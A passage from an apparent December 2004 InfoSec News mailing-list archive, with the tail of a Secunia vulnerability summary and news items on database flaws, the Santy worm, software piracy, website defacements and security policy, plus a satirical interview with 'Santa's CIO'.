which can be exploited to cause a DoS (Denial of Service), gain knowledge of sensitive information, or gain escalated privileges. Full Advisory: http://secunia.com/advisories/13610/ -- [SA13642] Docbook-to-Man Insecure Temporary File Creation Critical: Less critical Where: Local system Impact: Privilege escalation Released: 2004-12-23 Javier Fern?ndez-Sanguino Pe?a has reported a vulnerability in Docbook-to-Man, which can be exploited by malicious, local users to perform certain actions on a vulnerable system with escalated privileges. Full Advisory: http://secunia.com/advisories/13642/ -- [SA13640] LPRng "lprng_certs.sh" Script Insecure Temporary File Creation Critical: Less critical Where: Local system Impact: Privilege escalation Released: 2004-12-23 Javier Fern?ndez-Sanguino Pe?a has reported a vulnerability in LPRng, which can be exploited by malicious, local users to perform certain actions on a vulnerable system with escalated privileges. Full Advisory: http://secunia.com/advisories/13640/ -- [SA13633] Debian debmake Insecure Temporary Directory Creation Critical: Less critical Where: Local system Impact: Privilege escalation Released: 2004-12-23 Javier Fern?ndez-Sanguino Pe?a has reported a vulnerability in debmake, which can be exploited by malicious, local users to perform certain actions on a vulnerable system with escalated privileges. Full Advisory: http://secunia.com/advisories/13633/ -- [SA13598] Red Hat update for rh-postgresql Critical: Less critical Where: Local system Impact: Privilege escalation Released: 2004-12-21 Red Hat has issued an update for rh-postgresql. This fixes a vulnerability, which can be exploited by malicious, local users to perform certain actions on a vulnerable system with escalated privileges. Full Advisory: http://secunia.com/advisories/13598/ -- [SA13594] Red Hat update for glibc Critical: Less critical Where: Local system Impact: Privilege escalation Released: 2004-12-21 Red Hat has issued an update for glibc. This fixes a vulnerability, which can be exploited by malicious, local users to perform certain actions on a vulnerable system with escalated privileges. Full Advisory: http://secunia.com/advisories/13594/ -- [SA13589] IBM AIX Multiple Privilege Escalation Vulnerabilities Critical: Less critical Where: Local system Impact: Privilege escalation Released: 2004-12-21 Four vulnerabilities have been reported in AIX, which can be exploited by malicious, local users to gain escalated privileges. Full Advisory: http://secunia.com/advisories/13589/ -- [SA13575] Debian update for ethereal Critical: Less critical Where: Local system Impact: DoS Released: 2004-12-21 Debian has issued an update for ethereal. This fixes a vulnerability, which can be exploited by malicious people to cause a DoS (Denial of Service). Full Advisory: http://secunia.com/advisories/13575/ -- [SA13572] Linux Kernel Multiple Vulnerabilities Critical: Less critical Where: Local system Impact: Exposure of sensitive information, DoS Released: 2004-12-22 Multiple vulnerabilities have been reported in the Linux Kernel, which can be exploited by malicious, local users to cause a DoS (Denial of Service) or gain knowledge of potentially sensitive information. Full Advisory: http://secunia.com/advisories/13572/ -- [SA13565] HP-UX newgrp Privilege Escalation Vulnerability Critical: Less critical Where: Local system Impact: Privilege escalation Released: 2004-12-20 A vulnerability has been reported in HP-UX, which can be exploited by malicious, local users to gain escalated privileges. Full Advisory: http://secunia.com/advisories/13565/ -- [SA13528] changepassword Privilege Escalation Vulnerability Critical: Less critical Where: Local system Impact: Privilege escalation Released: 2004-12-17 Ariel Berkman has reported a vulnerability in changepassword, allowing malicious, local users to escalate their privileges. Full Advisory: http://secunia.com/advisories/13528/ -- [SA13521] Debian update for cscope Critical: Less critical Where: Local system Impact: Privilege escalation Released: 2004-12-17 Debian has issued an update for cscope. This fixes a vulnerability, which potentially can be exploited by malicious, local users to perform certain actions on a vulnerable system with escalated privileges. Full Advisory: http://secunia.com/advisories/13521/ -- [SA13519] Debian update for a2ps Critical: Less critical Where: Local system Impact: Privilege escalation Released: 2004-12-20 Debian has issued an update for a2ps. This fixes a vulnerability, which potentially can be exploited by malicious, local users to gain escalated privileges. Full Advisory: http://secunia.com/advisories/13519/ -- [SA13505] Red Hat update for zip Critical: Less critical Where: Local system Impact: Privilege escalation Released: 2004-12-17 Red Hat has issued an update for zip. This fixes a vulnerability, which potentially can be exploited by malicious, local users to gain escalated privileges. Full Advisory: http://secunia.com/advisories/13505/ -- [SA13503] Gentoo update for cscope Critical: Less critical Where: Local system Impact: Privilege escalation Released: 2004-12-17 Gentoo has issued an update for cscope. This fixes a vulnerability, which potentially can be exploited by malicious, local users to perform certain actions on a vulnerable system with escalated privileges. Full Advisory: http://secunia.com/advisories/13503/ -- [SA13501] NetBSD "compat" Privilege Escalation Vulnerabilities Critical: Less critical Where: Local system Impact: Privilege escalation, DoS Released: 2004-12-17 Evgeny Demidov has reported some vulnerabilities in NetBSD, which can be exploited by malicious, local users to cause a DoS (Denial of Service) and potentially gain escalated privileges. Full Advisory: http://secunia.com/advisories/13501/ -- [SA13498] Gentoo update for vim/gvim Critical: Less critical Where: Local system Impact: Privilege escalation Released: 2004-12-16 Gentoo has issued updates for vim and gvim. These fix some vulnerabilities, which can be exploited by malicious, local users to gain escalated privileges. Full Advisory: http://secunia.com/advisories/13498/ -- [SA13625] Mandrake update for logcheck Critical: Not critical Where: Local system Impact: Privilege escalation Released: 2004-12-23 MandrakeSoft has issued updated packages for logcheck. These fix a security issue, which potentially can be exploited by malicious, local users to escalate their privileges. Full Advisory: http://secunia.com/advisories/13625/ -- [SA13617] SUSE update for ncpfs Critical: Not critical Where: Local system Impact: DoS Released: 2004-12-22 SUSE has issued an update for ncpfs. This fixes a potential vulnerability, which can be exploited by malicious, local users. Full Advisory: http://secunia.com/advisories/13617/ -- [SA13549] uml-utilities Ethernet Connection Drop Security Issue Critical: Not critical Where: Local system Impact: DoS Released: 2004-12-20 Danny Lungstrom has reported a security issue in uml-utilities, which can be exploited by malicious, local users to cause a DoS (Denial of Service). Full Advisory: http://secunia.com/advisories/13549/ Other: Cross Platform:-- [SA13632] Sybase ASE Three Unspecified Vulnerabilities Critical: Highly critical Where: From remote Impact: Unknown Released: 2004-12-23 NGSSoftware has reported three vulnerabilities with unknown impacts in Sybase ASE. Full Advisory: http://secunia.com/advisories/13632/ -- [SA13508] MPlayer Multiple Vulnerabilities Critical: Highly critical Where: From remote Impact: System access Released: 2004-12-17 Multiple vulnerabilities have been reported in MPlayer, which can be exploited by malicious people to compromise a user's system. Full Advisory: http://secunia.com/advisories/13508/ -- [SA13620] 2Bgal "id_album" SQL Injection Vulnerability Critical: Moderately critical Where: From remote Impact: Manipulation of data Released: 2004-12-23 Romain Le Guen has reported a vulnerability in 2Bgal, which can be exploited by malicious people to conduct SQL injection attacks. Full Advisory: http://secunia.com/advisories/13620/ -- [SA13564] IMG2ASCII Unspecified Vulnerability Critical: Moderately critical Where: From remote Impact: Unknown Released: 2004-12-20 A vulnerability with an unknown impact has been reported in IMG2ASCII. Full Advisory: http://secunia.com/advisories/13564/ -- [SA13563] Kayako eSupport Cross-Site Scripting and SQL Injection Critical: Moderately critical Where: From remote Impact: Cross Site Scripting, Manipulation of data Released: 2004-12-20 James Bercegay has reported some vulnerabilities in Kayako eSupport, which can be exploited by malicious people to conduct cross-site scripting and SQL injection attacks. Full Advisory: http://secunia.com/advisories/13563/ -- [SA13555] Yanf "get()" Buffer Overflow Vulnerability Critical: Moderately critical Where: From remote Impact: System access Released: 2004-12-20 Ariel Berkman has reported a vulnerability in Yanf, which can be exploited by malicious people to compromise a user's system. Full Advisory: http://secunia.com/advisories/13555/ -- [SA13518] Cosminexus Web Contents Generator Buffer Overflow Vulnerability Critical: Moderately critical Where: From remote Impact: System access Released: 2004-12-17 The vendor has acknowledged a vulnerability in Cosminexus Web Contents Generator (Macromedia JRun), which can be exploited by malicious people to compromise a vulnerable system. Full Advisory: http://secunia.com/advisories/13518/ -- [SA13515] Moodle Multiple Unspecified Security Issues Critical: Moderately critical Where: From remote Impact: Unknown, Security Bypass, Exposure of sensitive information Released: 2004-12-17 Multiple security issues have been reported in Moodle. Some of these can potentially be exploited by malicious people to disclose sensitive information and bypass certain security restrictions, and others have unknown impacts. Full Advisory: http://secunia.com/advisories/13515/ -- [SA13513] Ikonboard "st" and "keywords" SQL Injection Vulnerability Critical: Moderately critical Where: From remote Impact: Manipulation of data Released: 2004-12-17 Positive Technologies has reported a vulnerability in Ikonboard, which can be exploited by malicious people to conduct SQL injection attacks. Full Advisory: http://secunia.com/advisories/13513/ -- [SA13500] AtBas 2fax "expandtabs()" Buffer Overflow Vulnerability Critical: Moderately critical Where: From remote Impact: System access Released: 2004-12-17 Ariel Berkman has discovered a vulnerability in AtBas 2fax, potentially allowing malicious people to gain system access. Full Advisory: http://secunia.com/advisories/13500/ -- [SA13619] PsychoStats "login" Cross-Site Scripting Vulnerability Critical: Less critical Where: From remote Impact: Cross Site Scripting Released: 2004-12-23 James Bercegay has reported a vulnerability in PsychoStats, which can be exploited by malicious people to conduct cross-site scripting attacks. Full Advisory: http://secunia.com/advisories/13619/ -- [SA13576] PHPFormMail "output_html()" Cross-Site Scripting Vulnerabilities Critical: Less critical Where: From remote Impact: Cross Site Scripting Released: 2004-12-20 Some vulnerabilities have been reported in PHPFormMail, which can be exploited by malicious people to conduct cross-site scripting attacks. Full Advisory: http://secunia.com/advisories/13576/ -- [SA13574] PHP-Nuke Workboard Module Cross-Site Scripting Critical: Less critical Where: From remote Impact: Cross Site Scripting Released: 2004-12-20 Lostmon has reported two vulnerabilities in the Workboard module for PHP-Nuke, which can be exploited by malicious people to conduct cross-site scripting attacks. Full Advisory: http://secunia.com/advisories/13574/ -- [SA13566] PERL Crypt::ECB Module ASCII "0" Encoding Security Issue Critical: Less critical Where: From remote Impact: Security Bypass Released: 2004-12-21 Bennett R. Samowich has discovered a security issue in Crypt::ECB, which makes it easier for malicious people to brute force passwords. Full Advisory: http://secunia.com/advisories/13566/ -- [SA13504] 68 Designs Froogle Installation Security Issue Critical: Less critical Where: From remote Impact: Security Bypass Released: 2004-12-17 Lostmon has reported a security issue in 68 Designs Froogle, which potentially can be exploited by malicious people to gain administrative privileges. Full Advisory: http://secunia.com/advisories/13504/ -- [SA13593] Symantec Brightmail AntiSpam Notifier Denial of Service Critical: Not critical Where: From remote Impact: DoS Released: 2004-12-21 A weakness has been reported in Symantec Brightmail AntiSpam, which can be exploited by malicious people to cause a DoS (Denial of Service). Full Advisory: http://secunia.com/advisories/13593/ ======================================================================== Secunia recommends that you verify all advisories you receive, by clicking the link. Secunia NEVER sends attached files with advisories. Secunia does not advise people to install third party patches, only use those supplied by the vendor. Definitions: (Criticality, Where etc.) http://secunia.com/about_secunia_advisories/ Subscribe: http://secunia.com/secunia_weekly_summary/ Contact details: Web : http://secunia.com/ E-mail : support@secunia.com Tel : +45 70 20 51 44 Fax : +45 70 20 51 45 ======================================================================== From isn at c4i.org Fri Dec 24 03:16:44 2004 From: isn at c4i.org (InfoSec News) Date: Fri Dec 24 03:33:58 2004 Subject: [ISN] Database flaws more risky than thought Message-ID: http://news.com.com/Database+flaws+more+risky+than+thought/2100-1002_3-5502538.html By Robert Lemos Staff Writer, CNET News.com December 23, 2004 Details of multiple security flaws in Oracle and IBM databases have been released by the security company that found them. The flaws, which were described in general terms in August and September by Next-Generation Security Software, could allow an attacker to remotely compromise servers running the database programs. Security company Symantec raised its Internet threat rating of the flaws to 2 from 1, based on the details released on Thursday. NGSSoftware gave users of the databases more than three months to fix their systems when it announced its discovery of the flaws. Oracle has already released patches for the 10 vulnerabilities affecting its 9i database, and IBM has issued fixes for two flaws in DB2 versions 7 and 8.1. "Some of these are more serious than others," said David Litchfield, a security researcher and co-founder of U.K.-based NGSSoftware. "Most of these vulnerabilities can be exploited remotely." The advisories can be found on NGSSoftware's Web site. From isn at c4i.org Fri Dec 24 03:16:55 2004 From: isn at c4i.org (InfoSec News) Date: Fri Dec 24 03:34:00 2004 Subject: [ISN] Army focuses on cyber protection Message-ID: http://www.fcw.com/fcw/articles/2004/1220/web-armywp-12-23-04.asp By Frank Tiboni Dec. 23, 2004 A recently issued Army white paper, "Fight the Network," provides a new framework for the Signal Regiment, the service's communications organization, as it changes to support lighter, more mobile warfighting units. Army information technology officials devised the document to help foster a different mind-set for communications personnel in defending and managing the service's networks, said Gordon Van Vleet, public affairs officer for the service's Network Enterprise Technology Command/Ninth Army Signal Command at Fort Huachuca, Ariz. Netcom officials oversee the operation, management and protection of the Army's networks. "Never before has the Signal Regiment been as critical to the success of our Army," Lt. Gen. Steve Boutelle, the service's chief information officer, wrote in the document's introduction. Army IT officials want the service's communications personnel to "fight" the network so they can provide secure, ample communications on demand to soldiers in combat anywhere in the world. The document identifies the importance of network availability, interoperability and control. The white paper marks Army IT officials' third wide-scale attempt in recent months to alert personnel to the urgency of operating and protecting the service's networks. In August, Boutelle told Army IT personnel at a conference that the service's systems are increasingly under cyberattack. In November, Boutelle's office released a brochure, "Fight the Network: The Network as a Weapon System," that highlights main points in the white paper. Industry officials said Boutelle and Army IT officials will likely focus on strengthening the operation, management and protection of the service's IT infrastructure during the upcoming fiscal 2006 budget process. They expect that Army officials will want to further consolidate the service's enterprise IT infrastructure. Among projects the Army wrapped up this past year were developing and fielding a more mobile battlefield communications system, the Joint Network Node; and completing the acquisition and speeding the development of a future battlefield communications system, the War-fighter Information Network-Tactical. From isn at c4i.org Fri Dec 24 03:17:06 2004 From: isn at c4i.org (InfoSec News) Date: Fri Dec 24 03:34:02 2004 Subject: [ISN] Security jobs on the rise Message-ID: http://www.nwfusion.com/news/2004/1223securjobs.html By Grant Gross IDG News Service 12/23/04 While IT employment numbers may be lagging, there is a glimmer of hope. The number of cybersecurity professionals is projected to grow at an annual compound rate of nearly 14% from now until 2008, according to a study released in November. "The Information Security Workforce Study," conducted by IDC (a sister company of CIO's publisher) for the International Information Systems Security Certification Consortium, or (ISC)2, projects that the number of information security professionals worldwide will be 2.1 million in 2008, up from 1.3 million currently. The survey of 5,371 full-time information security professionals in 80 countries found that 97% of respondents had moderate to very high expectations for career growth. Security professionals have also experienced growth in job prospects, career advancement, higher base salaries and salary premiums for certification at faster rates than other areas of IT. The survey results speak to the growing importance of information security, which "is beginning to be recognized more broadly as an enterprisewide area," says James R. Wade, a member of (ISC)2's board of directors. From isn at c4i.org Fri Dec 24 03:19:07 2004 From: isn at c4i.org (InfoSec News) Date: Fri Dec 24 03:34:04 2004 Subject: [ISN] An interview with Santa's CIO Message-ID: http://www.theregister.co.uk/2004/12/23/santas_cio_interview/ By William Knight 23rd December 2004 With hands on management and a little bit of star dust, Santa's IT operation goes without a hitch year after year. William Knight talks to the big guy's very secretive CIO and finds out it's not always eternal joyfulness at Christmas HQ. As interviews go this was not hard to arrange. Some weeks ago I'd said it would be interesting to meet Santa's CIO and he must have been listening because late one evening the door bell rings and an immaculately dressed chauffeur asks me if I'd like an interview. A huge limo is parked under the street lamp and circling exhaust fumes create a mysterious vignette. I note the number plate "RUD 0LF", just as the rear door opens and the chauffeur ushers me through. Inside, deep in white leather upholstery, sits an archetypal business man. No beard or red hat, just a dark suit and plain tie, with a lapel pin in the shape of a small Christmas pudding. ?nter Klaus is CIO of Christmas HQ, and as the mist billows round the windows and the car sets off he explains how his responsibilities centre on the NGBS (Naughty Girl & Boy System) with its billions of records. The reality of Christmas HQ is far from the pixies and fairies wonderland described in legend. Klaus must manage the terabytes of data and facilitate the Big Day (BD) or Christmas Eve. "We have tremendous organisation, logistics and planning for each year's timetable," he says. "I must make sure each child gets only what their record demands." The size of the job is impressive and while delivery is run with Santa's special abilities IT must rely on its own resources. "Magic is very expensive and hard to control," says Klaus explaining how it requires technical expertise to wield magic effectively. "Things can go very wrong without the right level of support, maintenance and specialist staff. "We recently implemented a Magic Oriented Architecture (MOA) but had enormous difficulties integrating NGBS. The project has been a major compliance exercise, but no matter what products say on the box, we've found there's no silver bullet." Compliance is Klaus's top item. Christmas HQ runs via many organisations world wide and each has its own requirements. Even though the enterprise is beyond any single jurisdiction they must still respond to requests from subsidiaries and pressure is escalating due to ever-more financial products given away in Christmas stockings. "Kids don't just want chocolate and model cars," he says. "They have sophisticated tastes we have to cater for." The UK's data protection act caused tremendous problems. "We were inundated with requests from upset little boys and girls who believed Santa had got it wrong; that they had in fact been good," he says. They have been forced into a massive record management program and employ hundreds of data entry staff at head office. On cue the car door opens and we step into a huge white-walled computer centre. Giant icicles hang majestically from the ceiling and rows of decorated Christmas trees serve as partitions between cells of busy workers tapping at their workstations. I wonder at the mix of ice and electricity, but though the temperature is mild - most of the staff were wearing T-shirts emblazoned with "Team Santa - Delivering IT for Christmas" - the ice isn't melting. I follow him along a partition to the bank of a babbling river running right through the middle of the building. He stops at the entrance to a foot bridge and swipes an ID card. A tinsel-clad barrier rises up to let us through. "On one side of the bridge we have the technicians," he says, "and on the other the management." He stops in the middle and points to group of Elf consultants constructing another crossing further downstream. "The consultants tell us to build bridges between the business and the IT department, that we sometimes misunderstand each other." We settle in an open-plan lounge on the far side of the river and Klaus describes why communication is so important. "Each year we have to finish by first light on 25 December - there is no option. Misunderstanding causes delays so we are always building more bridges between the camps." His request to move to a building without a river has been postponed for another year and Klaus has to deal with the realities of the situation. "Each year's BD is the goal. We have to remain focussed," he says. The rigid timetable and communication overhead creates formidable pressure and despite the wonderful surroundings and holiday atmosphere, this can throw up mavericks. Klaus relates an incident when the NGBS was updated with thousands of bogus records. "We had sacks of toys and gifts delivered to a warehouse full of mock-up boys and girls. It was a terrible scam," he says. "We only found out when our gnome-built produce was listed on eBay the day after Christmas." They traced the perpetrators through a hacked server on Christmas Island and to a dacha on the black sea. It turned out to be disgruntled contractor Gnomes annoyed at being left off the Christmas party guest list because they weren't permanent staff. Klaus talks of other threats and stresses his belief in careful risk management. To illustrate his point he pulls out a risk list showing "Incompetent Management" at the top. He laughs when I point it out. "Oh! I have them mixed up, this is the anonymous risks," he says and searches his pockets for another list. "This is it," he says. "The Christmas number one is always rather predictable I'm afraid." The list shows "Skills gap" at the top and a mitigation of "Identify training requirements". His staff are capable of solving most technical problems so when they identify areas that need better skills they order a book from Amazon, he says. The talent of his staff is hard to dispute. The RFID system - that's Rudolf's Indicated Direction - was created by a genius developer in an afternoon. "It uses a GPS system cross linked to the NGBS and a Neural Net finds the best route for Santa to take on the BD. The optimum route must consider sleigh loading, distribution points, weather patterns - all this is too complicated for procedural languages." Results are transmitted via an encrypted, always-on XMas Link (XML) to the big guy's monitor, and so far the system has never broken down. But now the genius developer involved has left the company without writing anything down they daren't touch it. "Nobody is quite sure how the RFID works," he says, "so we don't mention it at project meetings and we never reboot it." Other programs have been bolted on the side of the RFID so now they aren't certain if results comes from RFID or not. "Without it Santa's job would be impossible," he says. "We can never replace it or change it." He shrugs and reluctantly admits that an IT system has dictated how the business works. He hopes that one day they'll get the magic budget to fund a replacement, but in the meantime they have too many fixes to make in all the subsidiary systems. Despite the difficulties Klaus has an enviable record. For thirty years, not one deserving child has been missed from the Big Day's delivery and he credits his hard working staff and the dedication of the Boss. "We have a no-failure policy," he says. "We understand the situation and we work to it." He hopes that other CIOs can look forward to perfect deliveries at Christmas and wishes everybody a happy new year. From isn at c4i.org Fri Dec 24 03:20:38 2004 From: isn at c4i.org (InfoSec News) Date: Fri Dec 24 03:34:06 2004 Subject: [ISN] Happy Holidays! Message-ID: The staff at InfoSec News and C4I.org would like to wish you a very happy holidays and all the best for the new year! All the best for a happy, healthy and prosperous 2005 to you and your loved ones, I hope everyone elses hopes, wishes, & dreams come true! Cheers! William Knowles wk@c4i.org *==============================================================* "Communications without intelligence is noise; Intelligence without communications is irrelevant." Gen Alfred. M. Gray, USMC ---------------------------------------------------------------- C4I.org - Computer Security, & Intelligence - http://www.c4i.org *==============================================================* From isn at c4i.org Wed Dec 29 01:31:40 2004 From: isn at c4i.org (InfoSec News) Date: Wed Dec 29 01:51:28 2004 Subject: [ISN] Officials unseal piracy records Message-ID: http://www.press-citizen.com/apps/pbcs.dll/article?AID=/20041224/NEWS01/412240312/1079/RSS01 By Brian Sharp Iowa City Press-Citizen December 24, 2004 An Iowa City man who admitted to pirating copyrighted software then distributing it online is personally responsible for as much as $200,000 in losses to the industry, according to federal records unsealed Thursday. Jathan Desir, 26, became the first person convicted as part of "Operation Fastlink," [1] a multi-national investigation launched in April. Records show one of the two online libraries he helped create totaled 13,000 titles before FBI agents arrived at his home this spring. Desir, registered as a student at the University of Iowa, waived indictment and pleaded guilty Wednesday in U.S. District Court in Des Moines. He faces a maximum 15 years in prison on felony counts of copyright infringement and conspiracy. Sentencing is set for March 18. He was part of the "warez scene," an underground network of individuals and organized groups that compete in the market of large-scale, illegal dissemination of protected software. Members gain access to copyrighted material, often before its release, crack the digital protections and put it online for others to access, reproduce or pass along. According to federal court records: In January 2003, Desir and others set up an online library for a private group to share movies, games, utility software and music. The library grew to about 13,000 titles by the time of the federal raid in April. Transfer logs obtained from the computer service show Desir transferred numerous titles between Aug. 16, 2003, and April 2, 2004. Records show he copied and distributed at least 10 items every six months. He accessed the system from his Iowa City home, records show. No address was provided. On April 21, FBI agents executed a search warrant at his residence, seizing six personal computers, various computer components and equipment as well as computer games and software. Desir cooperated with authorities from the beginning, even signing a statement detailing his activities. He also has admitted to creating a second library federal agents seized in California. The search of Desir's residence was part of "Operation Fastlink," which targeted the underground community's hierarchy with agents conducting more than 120 searches within 24 hours in 27 states and 11 foreign countries. At the time, authorities identified nearly 100 people as leaders or high-ranking members of international piracy groups. Business Software Alliance, which represents several software manufacturers, examined the two computer servers linked to Desir and reported that each contained client titles exceeding $2,500 in retail value. The $2,500 value is a benchmark in the federal criminal code. Desir's sentence, once imposed, may still be reduced if he complies with all aspects of the plea agreement and assists in the investigation and prosecution of one or more others identified in the piracy probe. [1] http://www.cybercrime.gov/desirPlea.htm From isn at c4i.org Wed Dec 29 01:31:50 2004 From: isn at c4i.org (InfoSec News) Date: Wed Dec 29 01:51:31 2004 Subject: [ISN] Google worm targets AOL, Yahoo Message-ID: http://news.com.com/Google+worm+targets+AOL,+Yahoo/2100-7349_3-5504769.html By Paul Festa Staff Writer, CNET News.com December 28, 2004 Update: Days after Google acted to thwart the Santy worm, security firms warned that variants have begun to spread using both Google and other search engines. The Santy problem originally flared up a week ago as bulletin board Web sites found their pages erased and defaced by the worm's own text. The worm spread by targeting pages that used vulnerable versions of the PHP Bulletin Board (phpBB) software, and used Google to locate those pages. After Google took measures to prevent the worm from executing Google searches for the faulty bulletin board software, Santy variants are making the rounds using AOL and Yahoo search, according to security firms, and are still targeting Google as well. "Perl.Santy.B is a worm written in Perl script that attempts to spread to Web servers running versions of the phpBB 2.x bulletin board software prior to 2.0.11," warned Symantec in a Dec. 26 bulletin. "It uses AOL or Yahoo search to find potential new infection targets." AOL, which uses Google for its underlying search technology, said on Tuesday that its search engine should benefit from whatever protective measures Google implemented. "Google is only returning results associated with sites not vulnerable to the exploit packed by Perl.Santy," said AOL spokesman Andrew Weinstein. "So, as the issue has been handled by Google, we're able to say that we're blocking requests of this type." Yahoo, which dumped Google's search technology in February, could not be reached for comment. Several other variants are cropping up. Santy.c targets Google once again. Kaspersky Labs today renamed Santy.d and Santy.e Spyki.a and b., citing significant differences in the worms' structure from earlier Santies. The security firm also said the new worms were using the Brazilian Google for their exploits. Security researches last week faulted Google for not responding more swiftly to the emerging Santy threat. The Santy worm and its variants affect only targeted bulletin board sites and do not pose a threat to Web surfers who visit them. From isn at c4i.org Wed Dec 29 01:32:02 2004 From: isn at c4i.org (InfoSec News) Date: Wed Dec 29 01:51:32 2004 Subject: [ISN] Bush Needs To Ramp Up Cybersecurity In New Year Message-ID: http://www.informationweek.com/story/showArticle.jhtml;jsessionid=FXTXM3TQGBNY0QSNDBCSKHSCJUMEKJVN?articleID=56200702 By Larry Greenemeier Dec. 28, 2004 The Bush administration plans to address the demands to advance its cybersecurity policies in the new year, but some critics question whether the administration will go far enough to protect the United States from increasingly sophisticated cyberattacks and security breaches. The administration's stance is that cybersecurity's moving forward will inherently be part of any new federal government IT initiatives. Others, however, believe the president should create a distinct administrative cybersecurity position within the Homeland Security Department to oversee progress in the federal government and act as a liaison with private industry. Cybersecurity costs are expected to be factored into all agency budget requests. It's a matter the administration takes seriously enough that the Office of Management and Budget suggests agencies without adequate plans to improve cybersecurity shouldn't move to any new IT projects until cybersecurity is addressed, says Karen Evans, OMB's administrator for E-government and IT. Entering his second term, President Bush faces a number of challenges to IT-related initiatives such as cybersecurity. Perhaps the greatest challenge is a growing budget deficit projected to reach $521 billion for fiscal 2004. The president has promised to cut the deficit in half within five years, but much of this will depend on a reduction in spending, including a heavy reliance on IT to cut costs. "This doesn't necessarily mean that IT budgets will be cut," Evans says. "If an agency is properly managing their portfolio, their IT budget might go down because they're achieving the same or better results with the same amount of tax dollars." While OMB's expectation that each federal agency bake cybersecurity into its budget is a good start, the Cyber Security Industry Alliance is looking for the Bush administration to do more to get private industry to adopt such standards, since private industry owns and operates 90% of the United States' critical infrastructure. The alliance was launched in February by a group of technology providers including Computer Associates, Network Associates, and Symantec. The Bush administration has laid out a good cybersecurity strategy, says Paul Kurtz, the alliance's executive director and former senior director of critical infrastructure protection for the White House's Homeland Security Council. In a paper published earlier this month, however, the alliance urged Bush in his second term to use his influence to follow through on his National Strategy to Secure Cyberspace, a February 2003 initiative that called for the formation of a national cyberspace response system, a cyberspace security threat- and vulnerability-reduction program, and a cyberspace security-awareness and -training program. Kurtz acknowledges that the Department of Homeland Security has made some progress regarding cybersecurity, but he still would like to see responsibility for cybersecurity and physical security divided between two assistant secretaries. Robert Liscouski, Homeland Security assistant secretary for infrastructure protection, handles both. "We don't have that senior-level focal point to work with both industry and government on cybersecurity matters," he says. When Congress earlier this month passed a simplified version of its Intelligence Reform Act after cutting a provision that would have created a high-profile assistant secretary of cybersecurity within Homeland Security, advocates perceived this as a slight to cybersecurity's importance. "Often in this town, what really matters is the authority that comes with one's position," Kurtz says. "There's a lot that goes with such a position; it resonates on the Hill, creating accountability and someone the Hill can go to as a designated spokesman." Evans says the formal creation of an assistant secretary for cybersecurity position is unnecessary. Any distinct cybersecurity position within Homeland Security is a management issue that should be worked out within the department, she says. Both Evans and Kurtz agree, however, that the nation's data and IT infrastructure will only be protected through a partnership of government and industry. Such a partnership includes calling on private-sector companies to secure their systems, but also government's willingness to apply successful private-sector cybersecurity initiatives to its own systems, Evans says. "This is not all on the government's shoulders," Kurtz agrees. "There needs to be a great action on the part of private industry." The Commerce Department should, for example, urge CEOs to review cybersecurity measures during board meeting reviews of business operations, he adds. Setting aside the debate over the assistant secretary position, Kurtz is optimistic that cybersecurity will improve if the Senate ratifies the Council of Europe's Convention on Cybercrime and the Bush administration can encourage information-security governance in the private sector. Says Kurtz, "I'm confident that in a second term we'll see more action on these items." From isn at c4i.org Wed Dec 29 01:32:15 2004 From: isn at c4i.org (InfoSec News) Date: Wed Dec 29 01:51:35 2004 Subject: [ISN] Defacement Of Indian Websites On The Rise Message-ID: http://www.cxotoday.com/cxo/jsp/article.jsp?article_id=2513&cat_id=909 By CXOtoday Staff Mumbai Dec 24, 2004 The Indian Computer Emergency Response Team (CERT-In) has compiled a report [1] that speaks on how with the global rise in cyber terrorism activity, Indian websites too have come under fire by attackers, some of them being opportunists while others targeting specific sites and domains. The report covers defaced Indian websites only .in ccTLD (Indian country code top level domain). The range of the data obtained for analysis dates from 1998 to 20 September 2004. The total .in ccTLD registered domains is 6430 of which a majority comprises of .co.in domains. A total of 667 defacement records have been found under the .in ccTLD. The domain .co.in had 242 defacements which is more than 36% of the total defacements. According to the report, the number of .in ccTLD sites defaced was highest in the year 2001, when 219 sites were defaced. However, there has been an increase in the number of .gov.in sites being defaced every year. From only one site defaced in 1999, it increased to 43 in 2003. There is likely to be an increase in .gov.in sites defaced this year too, as 42 .gov.in sites have already been defaced this year, claims the report. More than 150 hacker/hacker groups have been responsible for defacing Indian websites. The group AIC (Anti India Crew) has defaced the most number of .in ccTLD sites accounting for 15% of the total .in ccTLD sites defaced. In terms of the hosting platforms on which .in sites were hosted, Windows had the highest number of defacements (338) as compared to Linux at 179. CERT-In has been set up by the government of India with the objective of promoting cyber security. [1] http://www.cert-in.org.in/knowledgebase/whitepapers/analysis_defacewebsites.htm From isn at c4i.org Wed Dec 29 01:32:39 2004 From: isn at c4i.org (InfoSec News) Date: Wed Dec 29 01:51:37 2004 Subject: [ISN] Linux Security Week - December 27th 2004 Message-ID: +---------------------------------------------------------------------+ | LinuxSecurity.com Weekly Newsletter | | December 27th, 2004 Volume 5, Number 51n | | | | Editorial Team: Dave Wreski dave@linuxsecurity.com | | Benjamin D. Thomas ben@linuxsecurity.com | +---------------------------------------------------------------------+ Thank you for reading the LinuxSecurity.com weekly security newsletter. The purpose of this document is to provide our readers with a quick summary of each week's most relevant Linux security headlines. This week, perhaps the most interesting articles include "Survivor's Guide to 2005: Security," "Security Starts from the Inside Out," " and "Linux lasting longer against Net attacks." --- >> Internet Productivity Suite: Open Source Security << Trust Internet Productivity Suite's open source architecture to give you the best security and productivity applications available. Collaborating with thousands of developers, Guardian Digital security engineers implement the most technologically advanced ideas and methods into their design. http://store.guardiandigital.com/html/eng/products/software/ips_overview.shtml --- LINUX ADVISORY WATCH Happy Holidays! This week, advisories were released for cscope,htget, a2ps, ethereal, xzgv, debmake, xcdroast, udev, cups, postgresql, namazu, pam, samba, glibc, krb5, php, gnumeric, abiword, libtiff, kfax, abcm2ps, phpMyAdmin, WordPress, NASM, mplayer, mpg123, wget, urpmi, aspell, krb5, logcheck, samba, Linux kernel, kerberos5, libxml, gd, XFree86, and nfs-utils. The distributors include Debian, Fedora, Gentoo, Mandrake, NetBSD, Trustix, Red Hat, and SuSE. http://www.linuxsecurity.com/content/view/117656/65/ ------------------------------------------------------------------- State of Linux Security 2004 In 2004, security continued to be a major concern. The beginning of the year was plagued with several kernel flaws and Linux vendor advisories continue to be released at an ever-increasing rate. This year, we have seen the reports touting Window's security superiority, only to be debunked by other security experts immediately after release. Also, Guardian Digital launched the new LinuxSecurity.com, users continue to be targeted by automated attacks, and the need for security awareness and education continues to rise. http://www.linuxsecurity.com/content/view/117655/49/ ----- Vincenzo Ciaglia Speaks Security 2004 Vincenzo Ciaglia of Linux Netwosix talks about this year of Linux Security. A full immersion in the world of Linux Security from many sides and 